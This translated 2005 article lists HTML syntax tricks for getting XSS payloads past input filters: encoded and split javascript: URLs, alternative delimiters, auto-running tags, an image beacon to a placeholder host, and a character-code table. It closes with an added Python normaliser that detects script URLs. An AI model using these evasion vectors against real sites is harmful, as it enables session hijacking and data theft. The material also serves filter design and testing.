
HTML syntax features

Authors: Algol, zFailure. Last changed 13.06.2005

One of the main ways sites protect themselves from XSS is to filter the characters a user enters. This article describes HTML syntax features that let such filters be bypassed.

Note that XSS vectors are browser-dependent. All the examples below were tested in IE6; in other versions or other browsers some of them may not work. For example, the backtick (`) is an attribute value delimiter only in IE; other browsers, such as Opera, do not treat this character as a delimiter.

  • Separators between tag attributes
    Besides the space, the slash (/), tab and line break can be used. The separator may be omitted altogether when the preceding attribute value is quoted.
     <image/src="1.png"/alt="Hint"/border="0"> (slash)
     <image src="1.png" alt="Hint" border="0"> (tab characters between the attributes)
     <image
     src="1.png"
     alt="Hint"
     border="0"> (line breaks)
     <image src="1.png"alt="Hint"border="0"> (no separator after a quoted value)
    
  • Attribute value delimiters
    Values may be enclosed in double quotes, single quotes or backticks, or left unquoted altogether.
     <image src="" alt="My hint" border="0">
     <image src="" alt='My hint' border="0">
     <image src="" alt=`My hint` border="0">
     <image src="" alt=Hint border="0">
    
  • Character encodings
    Character references inside a script are decoded before the script is executed:
     <img src=javascript:alert(&quot;ok&quot;)>
     <img src=javascript:alert(&#039;ok&#039;)>
     <img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#111&#107&#39&#41> (decodes to javascript:alert('ok'))
     <a href=javascript:alert(%22ok%22)>click me</a> (URL encoding works only in the href attribute)
    
    
  • String literal delimiters in scripts
    A string can be written without either kind of quote:
     <img src=javascript:alert('ok')>
     <img src=javascript:alert("ok")>
     <img src=javascript:a=/ok/;alert(a.source)>
     <img src=javascript:alert(String.fromCharCode(111,107))>
    
  • Bypassing the filtering of individual characters
     <img src=javascript:i=new/**/Image();i.src='http://bla.bla'> (a comment /**/ replaces the space)
     
  • Ways to run scripts
    Several ways to run a script automatically:
     <script>alert('ok')</script>
     <script src=1.js></script>
     <body onLoad=alert('ok')>
     <meta http-equiv=Refresh content=0;url=javascript:alert('ok')>
     <image src=1.png onload=alert('ok')>
     <image src=javascript:alert('ok')>
     <image src="" onerror=alert('ok')>
     <hr style=background:url(javascript:alert('ok'))>
     <span style=top:expression(alert('ok'))></span>
     <span sss="alert();this.sss=null" style=top:expression(eval(this.sss));></span> (works only once)
     <style type="text/css">@import url(javascript:alert('ok'));</style>
     <object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('ok')></object>
     <embed src=javascript:alert('ok');this.avi>
     <embed src=javascript:alert('ok');this.wav>
     <iframe src=javascript:alert('ok')> (IE only)
     <a href=javascript:alert(%22ok%22)>click me</a> (runs only when the link is clicked)
     <a href=javascript:alert('aaa'+eval('alert();i=2+2')+'bbb')>click me</a> (runs only when the link is clicked)
     <br SIZE="&{alert('XSS')}"> (Netscape 4.x only)
    
    
  • Script protocols and ways of writing them
     <img src=javascript:alert()>
     <img src=vbscript:AleRt()>
     <img src=JaVasCriPt:alert()>
     <img src="   javascript:alert()"> (spaces before the word javascript)
     
     <img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:alert()>
     <img src=javascript&#9:alert()>
     <img src=javascript&#10:alert()>
     <img src=javascript&#13:alert()>
     <img src="javascript
     :alert()"> (a tab character before the colon)
     
     <img src="java
     scri
     pt:ale
     rt()"> (inside the word javascript: tab characters, and carriage returns also work)
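The sections on character encodings and on script protocols above both come down to one point: the browser decodes references and drops tab/LF/CR before it reads the scheme, so a filter must normalise the same way first. The following check is an added example by the editor, not code from the original article; the function names and the sample inputs are the editor's own.

```python
import html
import re

# Tab, line feed and carriage return are ignored by the browser inside a URL
# scheme (see the vectors above), so they are removed before comparison.
_IGNORED_IN_SCHEME = re.compile(r"[\t\n\r]")
_SCRIPT_SCHEMES = ("javascript:", "vbscript:")


def normalize_url_attribute(value: str) -> str:
    """Reduce a src/href value to the form the browser actually acts on.

    Character references are decoded first (html.unescape also accepts the
    semicolon-less numeric form listed in the table below), then tab/LF/CR
    are dropped, then leading whitespace is removed and the text lower-cased.
    """
    decoded = html.unescape(value)
    squeezed = _IGNORED_IN_SCHEME.sub("", decoded)
    return squeezed.lstrip().lower()


def is_script_url(value: str) -> bool:
    """True if a lenient browser would execute the value as script."""
    return normalize_url_attribute(value).startswith(_SCRIPT_SCHEMES)


# Constructed inputs modelled on the variants above (not captured traffic).
SAMPLES = {
    "1.png": False,
    "http://example.invalid/javascript:x": False,
    "javascript:alert('ok')": True,
    "JaVasCriPt:alert()": True,
    "   javascript:alert()": True,
    "&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:alert()": True,
    "javascript&#9:alert()": True,
    "javascript&#13;:alert()": True,
    "java\n\tscri\r\npt:ale\trt()": True,
    "vbscript:MsgBox()": True,
}


def misclassified() -> dict:
    """Return {value: verdict} for every sample the check gets wrong (empty is good)."""
    return {v: is_script_url(v) for v, want in SAMPLES.items() if is_script_url(v) != want}


if __name__ == "__main__":
    for value in SAMPLES:
        print(f"{str(is_script_url(value)):5} {value!r}")
    print("misclassified:", misclassified())
```

A filter that compares the raw attribute text against the string "javascript:" misses every sample except the first plain one; comparing the normalised form catches them all.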
     
    
  • Scripts inside the style attribute
    Script statements inside the style attribute must be separated with "\;".
     <hr style=`background:url(javascript:alert('ok 1')\;alert('ok 2'))`>
    
  • Special tags
     <image src="1.png" alt="" border="0"> (the image tag is the same as img)
     <plaintext> (everything after this tag is treated as plain text, not HTML)
     <textarea> (everything after this tag is treated as plain text, not HTML)
     <xml> (everything after this tag is not displayed)
    
    
  • Table of frequently used codes:

    Symbol             Decimal   Hex*      Named   URL-encoded
    "                  &#34      &#x22;    &quot   %22
    '                  &#39      &#x27;            %27
    `                  &#96      &#x60;            %60
    <space>            &#32      &#x20;            +
    <tab>              &#9       &#x09;            %09
    <carriage return>  &#13      &#x0D;            %0D
    =                  &#61      &#x3D;            %3D
    <                  &#60      &#x3C;    &lt     %3C
    >                  &#62      &#x3E;    &gt     %3E
    \                  &#92      &#x5C;            %5C
    %                  &#37      &#x25;            %25
    +                  &#43      &#x2B;            %2B
    <soft hyphen>      &#173     &#xAD;    &shy    %AD
    &                  &#38      &#x26;    &amp    %26

    * In some cases the semicolon can be omitted (when the reference is at the end of the string, or when several references in this encoding follow one another).

    See related: http://ha.ckers.org/xss.html